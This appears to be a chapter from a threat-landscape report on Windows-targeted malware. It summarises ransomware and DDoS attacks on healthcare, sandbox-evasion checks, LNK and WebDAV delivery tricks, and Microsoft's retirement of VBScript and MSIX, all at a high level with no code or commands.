Chapter 3: Windows: A Prime Target for Cyber Threats
Windows remains a central focus for cyberattacks, being the predominant desktop operating system globally. The well-established attack strategies persist, with Stealers, Loaders, and Ransomware continuing as the primary threats. Notably, ransomware poses a significant global financial risk, affecting diverse sectors.
Healthcare Under Siege: Escalating Attacks and DDoS Threats
Healthcare providers, a critical sector, face an upsurge in cyber threats. Beyond ransomware, Distributed Denial of Service (DDoS) attacks have emerged, impacting facilities worldwide, including Germany, the United States, and Canada.
Rising Sophistication: Novel Evasion Techniques in Windows Malware
Windows-focused malware reaches new levels of sophistication, employing advanced evasion techniques.
Tactics include indirect syscalls, checking whether the machine is joined to a domain or Azure Active Directory, determining if a monitor is attached, and assessing if the system has more than 6-8GB of RAM. These advanced evasion methods indicate an escalating arms race between cybercriminals and cybersecurity defenses.
LNK Files and WebDAV Paths: Shifting Attack Methodologies
A notable challenge arises from the heightened complexity of LNK files , utilizing a mix of multiple tools such as PowerShell and batch scripting within a single LNK reference. Additionally, there’s a surge in the misuse of WebDAV (or UNC/MUP) paths for malware downloads, reflecting a shift in attack methodologies.
Microsoft’s Security Measures: Phasing Out Vulnerable Features
In response to these escalating threats, Microsoft has made strategic decisions to retire two features commonly exploited by malware developers. Both VBScript, a scripting language favored by many malware creators, and the MSIX app package format, are being phased out.
This move represents an important step by Microsoft to enhance the security of its operating system and protect users from malicious software.
